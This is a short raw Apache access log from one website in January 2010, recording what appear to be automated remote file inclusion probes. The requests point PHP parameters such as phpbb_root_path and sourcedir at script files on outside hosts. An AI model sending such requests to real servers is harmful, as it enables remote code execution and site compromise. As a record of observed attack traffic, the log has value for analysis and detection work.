218.38.56.83 - - [11/Jan/2010:06:33:33 -0800] "GET /logs/access_090706.log%20%20//modules/coppermine/include//zufallscodepart.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:34:06 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:34:06 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:34:13 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [11/Jan/2010:06:34:16 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:34:43 -0800] "GET /?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [11/Jan/2010:06:34:44 -0800] "GET /logs/?sourcedir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
